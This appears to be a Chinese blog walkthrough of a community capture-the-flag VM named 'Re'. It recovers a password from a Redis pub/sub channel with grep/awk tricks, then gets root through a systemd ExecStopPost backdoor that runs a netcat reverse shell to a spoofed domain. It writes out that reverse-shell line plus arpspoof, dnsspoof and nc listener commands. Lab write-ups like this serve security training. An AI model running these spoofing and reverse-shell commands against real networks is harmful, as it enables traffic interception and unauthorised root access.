title: ‘群友靶机–Re’
date: 2026-03-25 01:10:52
categories: 靶机复现
tags:
- 靶机复现
- wp
- 群友靶机
top_img: /img/top.jpg
Re
靶机名称: Re
作者:群主
靶机ID:619
难度: easy
靶机地址: https://maze-sec.com
靶机IP: 192.168.1.124
攻击机IP: 192.168.1.195(Kali Linux)
user
user直接ssh就可以得到账号密码
┌──(root㉿Gropers)-[~] └─# ssh sublarge@192.168.1.124 __ __ ____ | \/ | __ _ _______ / ___| ___ ___ | |\/| |/ _` |_ / _ \____\___ \ / _ \/ __| | | | | (_| |/ / __/_____|__) | __/ (__ |_| |_|\__,_/___\___| |____/ \___|\___| username: sublarge password: ******** sublarge@192.168.1.124's password:用户submini
ss -tulpn 发现靶机本地监听了 6379 (Redis) 端口
sublarge@Re:~$ ss -tulnp Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* tcp LISTEN 0 128 127.0.0.1:6379 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 128 [::1]:6379 [::]:* tcp LISTEN 0 128 *:80 *:* tcp LISTEN 0 128 [::]:22 [::]:*进入 redis-cli 执行 MONITOR 命令, 截获到后台的 publisher.py 正在慢慢的向 chan5 频道广播数据
拼凑出一个长度为 20 位的字符串
sublarge@Re:~$ redis-cli 127.0.0.1:6379> MONITOR OK 1775050053.331070 [0 [::1]:34418] "PUBLISH" "chan5" "7" 1775050058.335378 [0 [::1]:34418] "PUBLISH" "chan5" "U" 1775050058.336169 [0 [::1]:49944] "PING" 1775050058.336266 [0 [::1]:49944] "PUBLISH" "chan5" "r" 1775050063.339469 [0 [::1]:49944] "PUBLISH" "chan5" "R" 1775050068.343068 [0 [::1]:49944] "PUBLISH" "chan5" "p" 1775050073.347848 [0 [::1]:49944] "PUBLISH" "chan5" "G" 1775050078.351404 [0 [::1]:49944] "PUBLISH" "chan5" "7" 1775050083.355365 [0 [::1]:49944] "PUBLISH" "chan5" "u" 1775050088.360359 [0 [::1]:49944] "PUBLISH" "chan5" "r" 1775050093.363254 [0 [::1]:49944] "PUBLISH" "chan5" "4" 1775050098.367301 [0 [::1]:49944] "PUBLISH" "chan5" "Z" 1775050103.371106 [0 [::1]:49944] "PUBLISH" "chan5" "p" 1775050108.375034 [0 [::1]:49944] "PUBLISH" "chan5" "z" 1775050113.379080 [0 [::1]:49944] "PUBLISH" "chan5" "G" 1775050118.382983 [0 [::1]:49944] "PUBLISH" "chan5" "7" 1775050123.387316 [0 [::1]:49944] "PUBLISH" "chan5" "Q" 1775050128.391071 [0 [::1]:49944] "PUBLISH" "chan5" "I" 1775050133.395326 [0 [::1]:49944] "PUBLISH" "chan5" "z" 1775050138.399519 [0 [::1]:49944] "PUBLISH" "chan5" "4" 1775050143.403189 [0 [::1]:49944] "PUBLISH" "chan5" "H" 1775050148.407298 [0 [::1]:49944] "PUBLISH" "chan5" "7" 1775050153.411495 [0 [::1]:49944] "PUBLISH" "chan5" "U" 1775050153.412481 [0 [::1]:49046] "PING" 1775050153.412592 [0 [::1]:49046] "PUBLISH" "chan5" "r"这里可以通过ai得到完整的字符串是:rRpG7ur4ZpzG7QIz4H7U
也就是用户submini的密码
但是这里有一个出题人想要得到的点
就是不借助ai如何得到这串字符
正则
如果我们只订阅chan5就会得到乱序的字符串,且还需要提取出来
sublarge@Re:~$ redis-cli 127.0.0.1:6379> SUBSCRIBE chan5 Reading messages... (press Ctrl-C to quit) 1) "subscribe" 2) "chan5" 3) (integer) 1 1) "message" 2) "chan5" 3) "z" 1) "message" 2) "chan5" 3) "4" 1) "message" 2) "chan5" 3) "H" 1) "message" 2) "chan5" 3) "7" 1) "message" 2) "chan5" 3) "U" 1) "message" 2) "chan5" 3) "r" 1) "message" 2) "chan5" 3) "R" 1) "message" 2) "chan5" 3) "p" 1) "message" 2) "chan5" 3) "G" 1) "message" 2) "chan5" 3) "7" 1) "message" 2) "chan5" 3) "u" 1) "message" 2) "chan5" 3) "r" 1) "message" 2) "chan5" 3) "4" 1) "message" 2) "chan5" 3) "Z" 1) "message" 2) "chan5" 3) "p" 1) "message" 2) "chan5" 3) "z" 1) "message" 2) "chan5" 3) "G" 1) "message" 2) "chan5" 3) "7" 1) "message" 2) "chan5" 3) "Q" 1) "message" 2) "chan5" 3) "I" 1) "message" 2) "chan5" 3) "z" 1) "message" 2) "chan5" 3) "4" 1) "message" 2) "chan5" 3) "H" ^C sublarge@Re:~$看到出现重复的输出就可以停止了
把这些出去重复的数据都提取出来统一放到文件a中
通过输入 cat a|grep '数据特征' 来提取所需要的数据内容 ┌──(root㉿Gropers)-[~] └─# cat a|grep '3) "' 3) "z" 3) "4" 3) "H" 3) "7" 3) "U" 3) "r" 3) "R" 3) "p" 3) "G" 3) "7" 3) "u" 3) "r" 3) "4" 3) "Z" 3) "p" 3) "z" 3) "G" 3) "7" 3) "Q" 3) "I"后面这则是指定输出第二行得到想要的数据
┌──(root㉿Gropers)-[~] └─# cat a|grep '3) "'|awk -F'"' '{printf $2}' z4H7UrRpG7ur4ZpzG7QI在bash中会默认输出换行符
就可以输入
cat a|grep '3) "'|awk -F'"' '{printf $2}END{print x}'来达到删掉默认换行符的目的
纯正则表达式
cat a|grep -P '(?<=^3\) ").(?=")' -o这是得到了乱序的密码字符
通过输入两倍的字符以及$i- $((i+19))算法的控制可以达到不同开头的目的
┌──(root㉿Gropers)-[~] └─# for i in {1..20};do echo z4H7UrRpG7ur4ZpzG7QIz4H7UrRpG7ur4ZpzG7QI|cut -c $i-$((i+19));done > pass.txt┌──(root㉿Gropers)-[~] └─# cat pass.txt z4H7UrRpG7ur4ZpzG7QI 4H7UrRpG7ur4ZpzG7QIz H7UrRpG7ur4ZpzG7QIz4 7UrRpG7ur4ZpzG7QIz4H UrRpG7ur4ZpzG7QIz4H7 rRpG7ur4ZpzG7QIz4H7U RpG7ur4ZpzG7QIz4H7Ur pG7ur4ZpzG7QIz4H7UrR G7ur4ZpzG7QIz4H7UrRp 7ur4ZpzG7QIz4H7UrRpG ur4ZpzG7QIz4H7UrRpG7 r4ZpzG7QIz4H7UrRpG7u 4ZpzG7QIz4H7UrRpG7ur ZpzG7QIz4H7UrRpG7ur4 pzG7QIz4H7UrRpG7ur4Z zG7QIz4H7UrRpG7ur4Zp G7QIz4H7UrRpG7ur4Zpz 7QIz4H7UrRpG7ur4ZpzG QIz4H7UrRpG7ur4ZpzG7 Iz4H7UrRpG7ur4ZpzG7Q最终爆破得到了正确的密码
root
从群友(mooi)wp那得到的完整思路
1. Redis 宕机 -> 2. publisher.py 报错崩溃 -> 3. Systemd 触发 Root 后门 -> 4. 靶机 查询 DNS -> 5. Kali 伪造解析并接收反弹连接。查看/usr/local/bin/publisher.py文件后发现:如果连接 Redis 失败( redis.ConnectionError ),脚 本会直接执行 sys.exit(1) 崩溃退出。
猜测它是Systemd 管理的服务,找一下它的配置文件
/etc/systemd/system/redis-publisher.service发现留了一个后门
submini@Re:/etc/systemd/system$ cat redis-publisher.service ...... ExecStopPost=/bin/bash -c '/usr/bin/busybox nc dev.warning.dsz 1234 -e /bin/bash' ......只要能让该服务停止或崩溃,系统就会自动以 Root 权限向 dev.warning.dsz 的 1234 端口发起反弹 Shell!
局部网络劫持 (ARP & DNS Spoofing)
这个操作的最终目的就是为了让靶机认为 Kali 的 IP 就是 dev.warning.dsz 这个域名的真实归属地
这个操作一共需要kali上开启三个终端
终端A: ┌──(root㉿Gropers)-[~] └─# vim fake_dns.txt ┌──(root㉿Gropers)-[~] └─# cat fake_dns.txt 192.168.1.195 dev.warning.dsz ┌──(root㉿Gropers)-[~] └─# sudo dnsspoof -i eth0 -f fake_dns.txt dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.195]终端B: ┌──(root㉿Gropers)-[~] └─# sudo arpspoof -i eth0 -t 192.168.1.124 192.168.1.1 0:c:29:ee:66:e3 8:0:27:f6:43:fe 0806 42: arp reply 192.168.1.1 is-at 0:c:29:ee:66:e3终端C: ┌──(root㉿Gropers)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ...同时在靶机的submini用户终端直接对 Redis 服务下达停止指令(加上 nosave 防止因权限 不足导致的关机失败):
redis-cli shutdown nosave执行后等待重启就可以发现成功反弹shell
但是要注意因为会再次重启,shell会断开连接,只要再次对 Redis 服务下达停止指令就可以再次获得shell。
